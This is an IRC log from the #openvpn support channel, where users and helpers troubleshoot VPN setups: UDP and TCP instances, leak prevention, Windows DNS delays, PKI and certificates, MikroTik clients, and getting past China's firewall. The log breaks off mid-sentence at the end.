08:58 < ak5_> what should I say
08:58 < rob0> you should say what you want this nameserver to do.
08:59 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn
09:00 < kisom> Nice, seems you can have a network interface with Tor
09:00 < kisom> Gonna try and bridge it to my OpenVPN server
09:01 < rob0> I'm not sure how having a nameserver relates to the VPN/GFWChina issue, either.
09:02 < kisom> ak5_: By the way, SSH usually works fine in China.
09:02 < ak5_> kisom: yeah, but not for UDP
09:03 < ak5_> , right?
09:03 < kisom> SSH has built-in support for "VPNs" last time I checked
09:03 < ak5_> yes, -w
09:03 < kisom> Aka you can create a network interface to the remote machine
09:03 < rob0> ssh is TCP-only, yes
09:03 < kisom> Yes but you can still tunnel UDP over TCP.
09:03 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in]
09:04 < kisom> If that was the question.
09:04 < ak5_> but, I read this, which applies for -w but not -D or -L http://sites.inka.de/bigred/devel/tcp-tcp.html
09:04 <@vpnHelper> Title: Why TCP Over TCP Is A Bad Idea (at sites.inka.de)
09:04 < ak5_> which is why I wanted to go with openvpn instead of ssh - still unsure if that was the take-away, though :D
09:05 < kisom> Well, in my experience TCP over TCP works surprisingly well.
09:05 < rob0> TCP Over TCP Is A Bad Idea in general, not specific to the tunnel software.
09:05 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
09:05 < rob0> It works well if you are not losing any packets.
09:05 < ak5_> kisom: even when using flowcontrol?
09:06 < kisom> Yes
09:07 < kisom> I generally browse the web over my VPN, so yeah..
09:09 < ak5_> hm, interesting
09:09 < ak5_> any netsec books anyone recommends?
09:12 < Eagleman> Its not possible to connect to a server with a server certificate?
09:12 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
09:37 -!- mrebola [~cesar@187.245.157.97] has joined #openvpn
09:37 < mrebola> Hi everybody !
09:37 < mrebola> Is anybody here
09:37 < mrebola> I need some help :$
09:37 < mrebola> ?
09:38 <+hazardous> with
09:38 < mrebola> hi hazardous :D
09:38 < mrebola> thanks for asking
09:38 < mrebola> well
09:38 < mrebola> I installed openvpn in a centos server
09:38 < mrebola> with the rpm
09:38 < mrebola> was so easy to install
09:38 < mrebola> and I can configured the client in windows and mac
09:39 < mrebola> but unfortunately I use ubuntu as my major OS
09:39 < mrebola> and I cant connect to the vpn from there
09:39 < mrebola> I dont know where to take the crt o key file
09:40 < mrebola> to add in my vpn configs
09:40 < mrebola> you know the CA Certificate
09:40 < mrebola> can you help me a little , please ?
09:40 <+hazardous> i have no idea, never used ubuntu as a client unfortunately
09:40 < mrebola> or linux ?
09:41 < mrebola> think as a linux computer
09:41 < mrebola> windows and mac is so easy
09:41 < rob0> huh?
09:41 <+hazardous> i think he's trying to set up
09:41 < mrebola> hi rob0
09:41 <+hazardous> an openvpn client on ubunut
09:41 < mrebola> yep Im trying that
09:41 <+hazardous> aren't the crt and key settings just paths in the config
09:41 <+hazardous> and you can put them anywhere
09:41 < rob0> Make your config file. Put the files where it says they are. Run openvpn with that config.
09:42 -!- mcp [~mcp@wolk-project.de] has quit [Quit: ZNC - http://znc.sourceforge.net]
09:42 < rob0> Check ubuntu documentation for the quirks they have added.
09:42 < mrebola> well I installed the openvpn client and that thing ask me for the username , password and ca certificate , the last one is what I dont know where it is
09:42 < mrebola> well I tried
09:43 < mrebola> but I read I have to generate the keyfile and / or crt file
09:43 < mrebola> from a generator
09:43 < mrebola> wtha command
09:43 < mrebola> but that comand doesnt work in my computer
09:43 < mrebola> the weirdest thing is , I can use the vpn in windows and mac
09:43 < mrebola> just ubuntu is asking me for that file
09:43 <+hazardous> how are you using it in windows and mac
09:44 -!- Devastator [~devas@186.214.111.217] has quit [Changing host]
09:44 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
09:44 < mrebola> I just install the openvpn client and then put the user name and password
09:44 < mrebola> the client is gui
09:44 < mrebola> so I just write down my credentials
09:44 < mrebola> easy as pi
09:44 <+hazardous> apt-get install network-manager-openvpn
09:44 < mrebola> but heck linux dude , getting hard everything LOL
09:44 <+hazardous> open network manager and add an openvpn with type set to password?
09:45 < mrebola> yep thats what I have
09:45 < mrebola> network-manager-openvpn is already the newest version.
09:46 < mrebola> check this out
09:46 <+hazardous> docs say to add 'auth-user-pass' by itself on a line in openvpn conf
09:46 < mrebola> ammm
09:46 < mrebola> can you send me that link please
09:46 < mrebola> I dont remember ready anything about it
09:46 < mrebola> seems like you are about to save my ass LOL
09:49 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
09:52 < mrebola> cesar@cesar-UX31E:~$ sudo find / -name "openvpn.conf"
09:52 < mrebola> nothing !
09:52 < mrebola> this is cursed
09:53 < mrebola> cesar@cesar-UX31E:/etc/openvpn$ ls
09:53 < mrebola> client.conf
09:53 < mrebola> Think I found it
09:53 < |Mike|> good boy
09:53 < mrebola> hahaha
09:53 < mrebola> hi |Mike|
09:54 < mrebola> I feel so n00b with this thing
09:54 < |Mike|> sorry for me beeing sarcastic ;)
09:54 < mrebola> no problem :)
09:54 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
09:55 < mrebola> well I dont have any auth-user-pass in my /etc/openvpn/client.conf
09:56 < mrebola> does anybody know how to run this openvpn with the network-manager-openvpn in linux / ubuntu ?
09:56 < mrebola> or everybody here is a Mac or Windows user ?
09:57 < mrebola> |Mike|: what about you?
09:58 -!- Orbi [~opera@anon-184-7.vpn.ipredator.se] has joined #openvpn
10:15 -!- mrebola [~cesar@187.245.157.97] has left #openvpn []
10:24 < rob0> whew
10:24 < rob0> a "help vampire" has been sucking the lifeblood of #openvpn !
10:25 < |Mike|> i detached my screen... bussy
10:26 < |Mike|> 2013/01/26 16:43:20 < mrebola> but that comand doesnt work in my computer <-- sorry, but i had to laugh about him for a bit :P
10:29 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn
10:32 < rob0> Amazing how many people who don't understand computing and network basics "need" advanced network tricks like VPNs.
10:33 < |Mike|> I seen weirder stuff yesterday ;)
10:44 < frsk> I love how he started configuring OS X and Windows before even thinking about his major OS.. :-)
10:44 < |Mike|> he was lying about that frsk ;)
10:45 < frsk> Wouldn't be shocked :)
10:45 -!- mrebola [~cesar@187.245.157.97] has joined #openvpn
10:46 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi]
10:50 -!- mrebola [~cesar@187.245.157.97] has left #openvpn []
10:58 < |Mike|> lol?
11:00 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 244 seconds]
11:00 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn
11:11 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
11:13 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has joined #openvpn
11:13 < eugenmayer> Hello guys. pekster thank you for helping me last time (UPD issues) but my internet completly gone off..
11:14 < eugenmayer> Since i have trouble with my ISP paket loss (from 10-25%..so useless..) iam thinking about allowing UDP and TCP connections at the same time. Is this possible?
11:16 < eugenmayer> thats how my server configuration looks like currently : http://pastie.org/5869535
11:16 < eugenmayer> proto?
11:17 < eugenmayer> If you want your OpenVPN server to listen on a TCP port instead of a UDP port, use proto tcp instead of proto udp (If you want OpenVPN to listen on both a UDP and TCP port, you must run two separate OpenVPN instances).
11:18 < eugenmayer> found this..just in case…the issue with that would be that the networks would be seperated, right. I would like to have all clients in one net, no matter they are connected using UDP or TCP
11:21 < eugenmayer> AFAICs its not possible to run 2 instances for the same net for udp/tcp for the same IP range when using routed, but it could be done using bridged?
11:21 < eugenmayer> (reading https://forums.openvpn.net/topic8207.html)
11:21 <@vpnHelper> Title: OpenVPN Support Forum Issue with multiple instance (tcp & udp) : Configuration (at forums.openvpn.net)
11:24 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 240 seconds]
11:29 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 276 seconds]
11:30 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
11:36 -!- Orbi [~opera@anon-184-7.vpn.ipredator.se] has quit [Quit: Orbi]
11:43 < jackbrown> When I'm behind a VPN is the whols system behind it or it's possible that some program will use my normal connection revealing my IP ?
11:43 < eugenmayer> jackbrown: this is possible yes
11:45 < EugeneKay> Where "behind a VPN" means "using redirect-gateway", it is possible for a program to keep connections open using your old default gateway. New ones should pass through the vpn link, but this is not guaranteed by openvpn.
11:45 < EugeneKay> If you want to ensure no leaks occur you must use an outgoing firewall rule set(dropping all traffic except that going via the VPN, and the VPN link itself)
11:47 < jackbrown> EugeneKay: how?
11:47 < EugeneKay> man iptables
11:52 < jackbrown> EugeneKay: how can I easily check that when I'm behind a VPN nothing is using my normal connections ?
11:52 < uberushaximus> ifconfig
11:52 < jackbrown> EugeneKay: is this website enough ? http://www.dnsleaktest.com/
11:52 <@vpnHelper> Title: DNS leak test (at www.dnsleaktest.com)
11:53 <+hazardous> netstat -anp | grep yourvpnip?
11:53 < EugeneKay> No.
11:53 < EugeneKay> !101
11:53 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc
11:54 < jackbrown> EugeneKay: no ?
11:55 < EugeneKay> That website covers one possible leak. There are far more ways for them to develop.
11:56 < jackbrown> EugeneKay: that website covers web browser leaks? it that website doesn't shows any leak my http browsing is safe ?
11:57 < EugeneKay> That's not what I said; and no, that can't be guaranteed.
12:21 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
12:34 < eugenmayer> Are there any tutorials on how to combine strongswan with OpenVPN?
12:34 < eugenmayer> At least by asking google it seems not to be done often (i did not find anything)
12:36 < eugenmayer> http://serverfault.com/questions/432363/strongswan-and-openvpn-together is what i found for now\
12:36 <@vpnHelper> Title: amazon ec2 - Strongswan and OpenVPN together - Server Fault (at serverfault.com)
12:40 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
12:46 < kisom> eugenmayer: "Combine"? Just set up both and create a bridge or route?
12:48 < eugenmayer> kisom: is it that easy? Just dont get me wrong, i have 5 VPN nets, lets say 10.1.0.0-10.6.0.0, 4 are routed, 1 is bridged . Now when installing strongswan lets say for the 10.1 net, i use a different subnet there, or just lets say 10.11.0.0, then push a route to those clients to use 10.1.0.1 as the default gatway?
12:48 < eugenmayer> kisom: if you as why the heck i need both..its the old story..i have clients which do not have OpenVPN clients, only IPsec.
12:50 < eugenmayer> as far as i know EugeneKay does not like any bridged setups and iam sure there are reasons. So i guess i should use the "routed" way of doing this
12:51 < EugeneKay> !whybridge
12:51 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting
12:51 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit []
12:52 < eugenmayer> EugeneKay: in my case, the reason for tap is different. I need the device to stay alive even if the connection drops, as there are services bound to that (only) IP, and if tun goes done, this ip disapears and makes the service anvail
12:52 < eugenmayer> But iam sure thats just a very special case
12:53 < EugeneKay> I bind to eth0 and use DNAT to hop the traffic from tun0 over ;-)
12:53 < eugenmayer> Yeah know i have an issue - i did not understand a single word of what you just told me :)
12:53 < eugenmayer> (iam just honest)
12:54 < EugeneKay> At least you acknowledge that you have a problem
12:54 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 245 seconds]
12:56 < pppingme> SpookZA I have two "central points" (which don't have a physical network behind them), then every "site" has a simple static (basically a key and ifconfig statement) to both central points, one of the "sites" has three connections (cable, dsl, 3g, running on three seperate linux boxes as routers), most only have one though, all the sites have an rfc1918 /24, and not a single static route anywhere, all figured out with ospf, all sites also use t
12:56 < pppingme> heir main internet connection as default route, so only learned routes go through the wan.
12:57 -!- EugeneKay [eugene@stretchmyan.us] has quit [Quit: ZNC - http://znc.in]
12:58 -!- EugeneKay [eugene@itvends.com] has joined #openvpn
13:01 -!- rkantos [robin@4e.fi] has joined #openvpn
13:13 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn
13:30 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 256 seconds]
13:35 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 245 seconds]
13:51 -!- rkantos [~Name@4e.fi] has joined #openvpn
14:13 -!- Porkepix [~Porkepix@lns-bzn-27-82-248-28-249.adsl.proxad.net] has quit [Ping timeout: 246 seconds]
14:16 -!- Porkepix [~Porkepix@lns-bzn-24-82-64-185-50.adsl.proxad.net] has joined #openvpn
14:16 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 252 seconds]
14:21 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
14:22 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 252 seconds]
14:26 -!- b1rkh0ff [~b1rkh0ff@109.163.158.168] has joined #openvpn
14:29 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn
14:31 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
14:34 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection]
14:34 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn
14:39 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 244 seconds]
14:43 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds]
14:45 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds]
14:46 -!- rkantos [~Name@4e.fi] has quit [Remote host closed the connection]
14:46 -!- rkantos [robin@4e.fi] has joined #openvpn
14:51 -!- brute11k [~brute11k@89.249.235.94] has quit [Quit: Leaving.]
14:58 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has quit [Quit: ZNC - http://znc.in]
14:58 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn
15:07 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 245 seconds]
15:14 -!- youssef [~youssef@ip-83-134-156-208.dsl.scarlet.be] has joined #openvpn
15:15 -!- bisko [~bisko@178.254.232.159] has joined #openvpn
15:24 < SpookZA> pppingme: I have 3 offices, each has a link to the other ... and it starts getting funky if one link goes down, even though each link has an iroute for both of the others :P ... my ospf works like a charm, openvpn just gets its panties in a knot
15:26 -!- rkantos [robin@4e.fi] has joined #openvpn
15:34 -!- zrzerenato [~zrzerenat@177.106.200.112] has joined #openvpn
15:34 < zrzerenato> hy every one ..
15:40 -!- zrzerenato [~zrzerenat@177.106.200.112] has left #openvpn []
15:40 -!- zrzerenato [~zrzerenat@177.106.200.112] has joined #openvpn
15:42 -!- zrzerenato [~zrzerenat@177.106.200.112] has quit []
15:45 -!- rkantos [robin@4e.fi] has quit [Ping timeout: 276 seconds]
15:54 -!- rkantos [robin@4e.fi] has joined #openvpn
16:17 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
16:28 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn
16:28 -!- ade_b [~Ade@koln-4d0b1082.pool.mediaWays.net] has joined #openvpn
16:28 -!- ade_b [~Ade@koln-4d0b1082.pool.mediaWays.net] has quit [Changing host]
16:28 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
16:31 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
16:52 < youssef> hi every one, can someone help me to setup my routing stuff, please i'm getting crazy with this.
16:57 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 256 seconds]
16:57 -!- bisko [~bisko@178.254.232.159] has quit [Quit: Computer has gone to sleep.]
16:59 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
16:59 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn
17:04 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 256 seconds]
17:06 -!- roentgen [~arthur@openvpn/community/support/roentgen] has joined #openvpn
17:10 -!- roentgen [~arthur@openvpn/community/support/roentgen] has quit [Ping timeout: 256 seconds]
17:14 < pppingme> SpookZA I don't have ANY routing in openvpn, each side has an ifconfig in the openvpn.conf file (each site runs on a different port, so the center point is actually running multiple openvpn daemons, but each one is incredibly simple in its setup) and thats it, no iroutes or anything else, in terms of openvpn, its about as simple as it gets.
17:18 -!- eugenmayer [~EugenMaye@HSI-KBW-109-193-196-063.hsi7.kabel-badenwuerttemberg.de] has quit [Quit: Leaving.]
17:32 -!- haswelll [~HU@192.73.252.248] has joined #openvpn
17:32 < haswelll> hey
17:33 < haswelll> why is there always a delay of around 1 minute after i connect to vpn before i can browse websites?
17:33 < haswelll> the client goes green but i have to wait ages
17:33 < haswelll> running 2.3 on windows 7 64
17:33 < haswelll> :)
17:34 < haswelll> ./whois haswelll
17:34 -!- haswelll [~HU@192.73.252.248] has quit [Client Quit]
17:34 <+pekster> Check your logs to get an idea of the timeline of your connection attempt
17:35 <+pekster> Or quit before I answer :P
17:37 -!- haswelll [~HU@192.73.252.248] has joined #openvpn
17:37 <+pekster> <+pekster> Check your logs to get an idea of the timeline of your connection attempt
17:37 < haswelll> ok
17:38 < haswelll> client log shows no errors, it takes about 3 seconds to connect and the icon turns green
17:39 <+pekster> Then the VPN is connected. Once you see the 'Initialization Sequence Completed' message, OpenVPN has done everything it has been told
17:40 < haswelll> server log shows same
17:40 < haswelll> down to the second
17:40 < haswelll> i'm guessing this might be some route table issue on windows
17:40 <+pekster> Routes are added before you get that message
17:41 <+pekster> At least if you let openvpn manage them
17:41 < haswelll> then im wondering if it could be a dns thing as i push dns from server
17:41 < haswelll> maybe windows takes some time to adjust
17:41 <+pekster> Probably. DNS is somewhat of a PITA under Windows since it doesn't play well on multi-homed networks
17:42 < haswelll> gonna try setting dns on the adapter and not pushing it
17:42 <+pekster> You can tinker with the --register-dns setting, although that's more of a hack than anything. I developed a custom solution last domain-environmnet where we had split-DNS in order to make sure OpenVPN played nice with the internal DNS setup and warn the user if something went wrong
17:42 <+pekster> Yet another case of Windows not playing nice with others
17:46 < haswelll> if a hack works i'll take it ;)
17:48 -!- HU_ [~HU@180.155.14.35] has joined #openvpn
17:49 -!- HU_ [~HU@180.155.14.35] has quit [Client Quit]
17:51 -!- haswelll [~HU@192.73.252.248] has quit [Ping timeout: 256 seconds]
17:51 -!- haswelll_ [~HU@192.73.252.248] has joined #openvpn
17:51 < haswelll_> didn't help
17:52 < haswelll_> irc auto connects at the exact moment web pages will finally load
17:52 < haswelll_> dont think it's dns thing
17:53 <+pekster> If you can ping your VPN peer by IP then it's not an openvpn thing
17:53 < haswelll_> ach i didnt restart openvpn after removing push dns from server conf
17:53 <+pekster> I wrote an awful lot of code to make DNS "just work" under a Windows enviornmnet. It's non-trivial to diagnose and fix crap like that given how awful the OS is
17:53 < haswelll_> what OS do you use
17:53 <+pekster> Many
17:55 -!- APTX [~APTX@unaffiliated/aptx] has quit [Ping timeout: 248 seconds]
17:57 -!- haswelll_ [~HU@192.73.252.248] has quit [Read error: Connection reset by peer]
17:57 -!- haswelll_ [~HU@192.73.252.248] has joined #openvpn
17:57 < haswelll_> lol
17:57 < haswelll_> this will sound weird but
17:58 < haswelll_> now its instant, but only after i let it use blowfish
17:58 < haswelll_> had it set to aes
17:58 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
17:58 < haswelll_> doesn't make any sense
17:58 < wh1p> isnt blowfish an irc plugin?
17:59 < haswelll_> default cipher if u dont specify one in your configs
17:59 < dioz> http://en.wikipedia.org/wiki/Blowfish_(cipher)
17:59 < haswelll_> supposedly a bit faster than aes in general but doesnt explain why it gets rid of the delay
17:59 < haswelll_> before i couldn't even ping 10.8.0.1 until after 60 seconds
18:00 < haswelll_> and i have an i5 with aes instructions
18:01 <+pekster> That probably dones't actually matter since the official builds are backwards-compatable with far older chipsets
18:01 <+pekster> Unless you're passing hardware crypto options
18:02 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has left #openvpn ["Leaving"]
18:02 < haswelll_> unless that happens magically behind the scenes, im not
18:05 -!- mrebola [~cesar@187.245.157.97] has joined #openvpn
18:05 -!- mrebola [~cesar@187.245.157.97] has left #openvpn []
18:10 < haswelll_> im thinking it might be a bug
18:10 < haswelll_> happens also on my laptop
18:13 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Read error: Operation timed out]
18:13 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Read error: Operation timed out]
18:14 -!- black_ [black@got.laid.using.blackmajic.org] has quit [Read error: Operation timed out]
18:14 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Read error: Operation timed out]
18:16 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has joined #openvpn
18:17 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn
18:17 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
18:17 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn
18:20 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection]
18:23 -!- haswelll_ [~HU@192.73.252.248] has quit [Quit: Leaving]
18:32 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"]
18:33 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
18:34 -!- JackWinter [~jack@vodsl-4655.vo.lu] has left #openvpn ["Konversation terminated!"]
18:37 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn
19:04 -!- p3rror [~mezgani@2001:0:53aa:64c:1c25:7ae9:d673:2d87] has joined #openvpn
19:06 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 255 seconds]
19:07 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn
19:08 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
19:11 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
19:15 -!- APTX [~APTX@unaffiliated/aptx] has quit [Read error: Operation timed out]
19:16 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
19:16 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
19:16 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
19:16 -!- mode/#openvpn [+o krzee] by ChanServ
19:16 <@krzee> [04:31] hi everyone, I am trying to create a small vpn to access the web securely in China. I wanted to ask if I can use openvpn via https?
19:16 <@krzee> [04:40] Yes you can, use tcp and port 443
19:16 <@krzee> ak5_, i dont think that is true anymore ^
19:17 <@krzee> !obs
19:17 <@krzee> !ping
19:17 <@vpnHelper> pong
19:17 <@krzee> !factoids
19:17 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php
19:17 <@krzee> !obfs
19:17 <@vpnHelper> "obfs" is (#1) if you are looking to obfuscate your traffic to get through a firewall that recognizes and blocks openvpn, try using this proxy: obfsproxy https://www.torproject.org/projects/obfsproxy.html.en or (#2) http://community.openvpn.net/openvpn/wiki/TrafficObfuscation
19:19 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
19:24 <@krzee> dazo said "Please misunderstand me correctly ... I do like the idea of obfuscation in OpenVPN."
19:24 <@krzee> lol i like the wording :D
19:25 -!- p3rror [~mezgani@2001:0:53aa:64c:1c25:7ae9:d673:2d87] has quit [Ping timeout: 245 seconds]
19:29 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has left #openvpn []
19:30 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has joined #openvpn
19:32 -!- blackmagic [black@got.laid.using.blackmajic.org] has quit [Ping timeout: 246 seconds]
20:24 -!- u0m3 [~Radu@109.96.140.34] has quit [Read error: Connection reset by peer]
20:50 -!- u0m3 [~Radu@109.96.140.34] has joined #openvpn
21:17 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Read error: Connection reset by peer]
21:29 -!- Cpt-Oblivious is now known as mynewnick
21:29 -!- mynewnick is now known as Cpt-Oblivious
21:34 -!- denon [~denon@unaffiliated/denon] has joined #openvpn
21:35 < denon> anyone awake with experience using openvpn on Mikrotik?
21:38 < denon> seems pretty much stock, just doesnt do client cert .. only user/pass ..
21:45 <+pekster> denon: OpenVPN in a stock build suports SSL/TLS connections; it's possible to perform a build that lacks that support, but I don't see why anyone would want that
21:50 -!- jthunder_ [~jthunder@174.3.126.51] has joined #openvpn
21:51 -!- jthunder_ [~jthunder@174.3.126.51] has quit [Client Quit]
21:52 < denon> pekster: yeah, Im not entirely sure I understand their implementation yet
21:52 <+pekster> I've run openvpn on the OpenWRT platform with wonderful results
21:53 < denon> well, this is a nice 30-some core box with 12 interfaces LACP'd to various spots in the network, I'd prefer not to add another appliance
21:54 -!- jthunder [~jthunder@174.3.126.51] has quit [Ping timeout: 252 seconds]
21:54 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
21:57 <+pekster> Oh, I'm not familiar with that device
21:58 <+pekster> Some quick searching online revelaed that company also makes routers, so I assumed a low-end embedded-style system
21:58 <+pekster> Ultimately it comes down to how the program was compiled. If it wasn't built with a certain support, it won't work. Pretty basic ;)
21:59 -!- mode/#openvpn [+v denon] by krzee
22:02 <@krzee> denon, if you want l/p
22:02 <@krzee> !authpass
22:03 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name
22:06 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder]
22:08 <@krzee> !pki
22:08 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that eachother were signed by the right ca.key. Optionally, the client also checks that the server cert was
22:08 <@vpnHelper> signed specially as a server (see !servercert)
22:08 <@krzee> ^ denon, if you use easy-rsa you can follow link #1
22:08 <@krzee> personally i use:L
22:08 <@krzee> !ssl-admin
22:08 <@vpnHelper> "ssl-admin" is (#1) if you use freebsd, it is in ports or (#2) svn co https://www.secure-computing.net/svn/trunk/ssl-admin to grab it from svn or (#3) A perl script for managing SSL certificates (being a CA). Makes a good replacement for easy-rsa
22:09 <+pekster> Well, if the gadget he's using supports it. You can do ./configure --disable-ssl when performing a build
22:09 <+pekster> I don't know if he means the frontend doesn't support it, or the program itself
22:09 <@krzee> [19:53] well, this is a nice 30-some core box with 12 interfaces LACP'd to various spots in the network, I'd prefer not to add another appliance
22:10 <+denon> you dont get direct access to it, it's wrapped in their OS shell and gui
22:10 <@krzee> just so you know, openvpn is single threaded and will only use 1 core
22:10 <+denon> krzee: pretty sure they spin up new threads per vpn instance
22:10 <@krzee> wrong
22:11 <+denon> no, I mean pretty sure mikrotik does ... you can run several instances which are totally different versions afaik
22:11 <+denon> I assumed it was isolated daemons, configs, etc
22:12 <+pekster> Per instance, yes, it's a separate process (not a thread, to clarify; one instance = one process = one thread)
22:12 <@krzee> ^^
22:12 <@krzee> 'but i highly doubt they do that, unless they havnt updated since openvpn version 1
22:12 <@krzee> lol
22:13 <@krzee> denon, it would also be a different socket per instance
22:13 <@krzee> ip:port
22:13 <+denon> yeah
22:13 <@krzee> if they use the same socket, they use the same thread
22:14 <@krzee> (with openvpn)
22:14 <+denon> yeah, they have the facility to run different configs on different vlans/etc, so diffrent socket of course
22:14 <+denon> anyway, I dont much care how it works in their end at the moment :)
22:14 <@krzee> unless magically retarded firewall rules redirect or something, but that would be too insane
22:14 <+pekster> Yet don't support X509 cets? Seems really stupid to me
22:15 <@krzee> i bet it does support certs
22:15 <@krzee> ild bet he just needs to figure out how
22:15 <@krzee> unfortunately ive never even heard of what hes using
22:15 <+denon> well, I was looking at some old documentation that stated that ..
I'm trying to figure out how it really works yes 22:15 <+pekster> We can help you with the actual config openvpn uses; we (generally) don't deal with supporting goofy frontends (see your app mfgr if you need that) 22:18 -!- b1rkh0ff [~b1rkh0ff@109.163.158.168] has quit [Ping timeout: 252 seconds] 22:19 -!- b1rkh0ff [~b1rkh0ff@31.176.152.170] has joined #openvpn 22:19 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 22:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 22:20 -!- mode/#openvpn [+o krzee] by ChanServ 22:21 <+denon> krzee: get off the dialup man :) 22:22 <+pekster> Or just sign up for your free year of AWS t1.micro 24/7 cloud usage (if you're a new user 22:22 <@krzee> this router is about to die 22:22 <@krzee> good thing i bought another, just gotta go replace 22:23 <@krzee> getting heavy packet loss to the router itself, lol 22:23 < hazardous> krzee: http://www.ubnt.com/edgemax 22:23 <@vpnHelper> Title: EdgeMAX | Ubiquiti Networks, Inc. (at www.ubnt.com) 22:23 < hazardous> ever use one of these 22:23 <@krzee> man im in the mountains 22:23 <@krzee> lucky im even online 22:23 < hazardous> it supports openvpn ok 22:23 <+pekster> My poor *wrt (the one with 16M RAM) recently put up with 